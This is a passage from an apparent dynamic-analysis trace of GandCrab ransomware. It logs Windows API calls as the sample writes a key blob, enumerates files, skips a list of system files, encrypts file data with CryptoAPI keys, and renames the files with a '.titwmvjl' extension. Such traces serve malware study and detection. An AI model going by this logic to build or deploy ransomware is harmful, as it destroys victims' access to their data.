6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0097.033] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0097.034] CloseHandle (hObject=0x230) returned 1 [0097.034] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.034] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.034] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x2a, wMilliseconds=0x15c)) [0097.034] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0097.034] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0097.034] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0097.035] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Public\\Libraries\\d2ca4a09d2ca4deb61a.lock") returned 50 [0097.035] CreateFileW (lpFileName="C:\\Users\\Public\\Libraries\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\public\\libraries\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0097.035] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.035] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.035] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\") returned 26 [0097.035] lstrcatW (in: lpString1="C:\\Users\\Public\\Libraries\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Libraries\\*") returned="C:\\Users\\Public\\Libraries\\*" [0097.035] FindFirstFileExW (in: lpFileName="C:\\Users\\Public\\Libraries\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0x5037f8 [0097.035] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0097.035] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0097.036] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0097.036] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0097.036] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0097.036] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0097.036] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0097.036] lstrcatW (in: lpString1="C:\\Users\\Public\\Libraries\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\Public\\Libraries\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\Public\\Libraries\\d2ca4a09d2ca4deb61a.lock" [0097.036] lstrlenW (lpString=".titwmvjl") returned 9 [0097.036] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\d2ca4a09d2ca4deb61a.lock") returned 50 [0097.036] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.037] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Public\\Libraries\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 59 [0097.037] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\d2ca4a09d2ca4deb61a.lock") returned 50 [0097.037] lstrlenW (lpString=".lock") returned 5 [0097.037] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0097.037] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0097.037] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.037] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.037] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0097.037] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0097.037] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0097.037] lstrcatW (in: lpString1="C:\\Users\\Public\\Libraries\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\Public\\Libraries\\desktop.ini") returned="C:\\Users\\Public\\Libraries\\desktop.ini" [0097.037] lstrlenW (lpString=".titwmvjl") returned 9 [0097.037] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\desktop.ini") returned 37 [0097.037] VirtualAlloc (lpAddress=0x0, dwSize=0x8a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.037] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Public\\Libraries\\desktop.ini.titwmvjl") returned 46 [0097.038] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\desktop.ini") returned 37 [0097.038] lstrlenW (lpString=".ini") returned 4 [0097.038] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0097.038] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ini ") returned 5 [0097.038] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0097.038] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.038] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\desktop.ini") returned 37 [0097.038] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\desktop.ini") returned 37 [0097.038] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0097.038] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.038] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0097.038] lstrcmpW (lpString1="RecordedTV.library-ms", lpString2=".") returned 1 [0097.038] lstrcmpW (lpString1="RecordedTV.library-ms", lpString2="..") returned 1 [0097.038] lstrcatW (in: lpString1="C:\\Users\\Public\\Libraries\\", lpString2="RecordedTV.library-ms" | out: lpString1="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" [0097.038] lstrlenW (lpString=".titwmvjl") returned 9 [0097.038] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned 47 [0097.038] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.039] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.titwmvjl") returned 56 [0097.039] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned 47 [0097.039] lstrlenW (lpString=".library-ms") returned 11 [0097.039] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0097.039] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".library-ms ") returned 12 [0097.039] lstrcmpiW (lpString1=".library-ms", lpString2=".titwmvjl") returned -1 [0097.039] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.040] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned 47 [0097.040] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned 47 [0097.040] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="desktop.ini") returned 1 [0097.040] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="autorun.inf") returned 1 [0097.040] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="ntuser.dat") returned 1 [0097.040] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="iconcache.db") returned 1 [0097.040] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="bootsect.bak") returned 1 [0097.040] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="boot.ini") returned 1 [0097.040] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="ntuser.dat.log") returned 1 [0097.040] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="thumbs.db") returned -1 [0097.040] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0097.040] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0097.040] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="KRAB-DECRYPT.html") returned 1 [0097.040] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="CRAB-DECRYPT.html") returned 1 [0097.040] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="KRAB-DECRYPT.txt") returned 1 [0097.040] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="CRAB-DECRYPT.txt") returned 1 [0097.040] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="ntldr") returned 1 [0097.040] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="NTDETECT.COM") returned 1 [0097.040] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="Bootfont.bin") returned 1 [0097.040] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned 47 [0097.040] lstrlenW (lpString=".library-ms") returned 11 [0097.040] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0097.040] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".library-ms ") returned 12 [0097.040] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.040] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0097.041] CreateFileW (lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0097.041] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.041] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0097.043] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.043] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0097.043] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0097.043] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0097.044] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0097.044] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0097.044] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0097.044] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0097.044] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0097.044] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.044] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0097.044] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0097.044] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0097.045] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0097.045] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0097.045] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0097.045] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0097.045] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0097.045] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.045] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0097.045] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0097.046] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0097.046] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503678) returned 1 [0097.046] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0097.046] CryptGetKeyParam (in: hKey=0x503678, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0097.046] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0097.046] CryptEncrypt (in: hKey=0x503678, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0097.046] GetLastError () returned 0x0 [0097.046] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0097.046] CryptDestroyKey (hKey=0x503678) returned 1 [0097.047] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0097.047] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0097.047] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0097.047] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0097.047] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0097.047] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503338) returned 1 [0097.047] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0097.047] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0097.048] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0097.048] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0097.048] GetLastError () returned 0x0 [0097.048] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0097.048] CryptDestroyKey (hKey=0x503338) returned 1 [0097.048] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0097.048] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0097.048] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0097.048] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0097.049] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x3e7, lpOverlapped=0x0) returned 1 [0097.060] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffc19, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.060] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x3e7, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x3e7, lpOverlapped=0x0) returned 1 [0097.104] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.104] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0097.105] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.109] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.109] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.109] CloseHandle (hObject=0x2ac) returned 1 [0097.109] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), lpNewFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.titwmvjl" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.titwmvjl"), dwFlags=0x1) returned 1 [0097.110] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.110] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0097.110] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0097.110] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0097.110] lstrcatW (in: lpString1="C:\\Users\\Public\\Libraries\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\Public\\Libraries\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\Public\\Libraries\\TITWMVJL-DECRYPT.txt" [0097.110] lstrlenW (lpString=".titwmvjl") returned 9 [0097.110] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\TITWMVJL-DECRYPT.txt") returned 46 [0097.110] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.110] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Public\\Libraries\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 55 [0097.111] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\TITWMVJL-DECRYPT.txt") returned 46 [0097.111] lstrlenW (lpString=".txt") returned 4 [0097.111] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0097.111] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0097.111] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0097.111] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.111] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\TITWMVJL-DECRYPT.txt") returned 46 [0097.111] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\TITWMVJL-DECRYPT.txt") returned 46 [0097.111] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0097.111] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0097.111] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0097.111] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0097.111] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0097.111] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 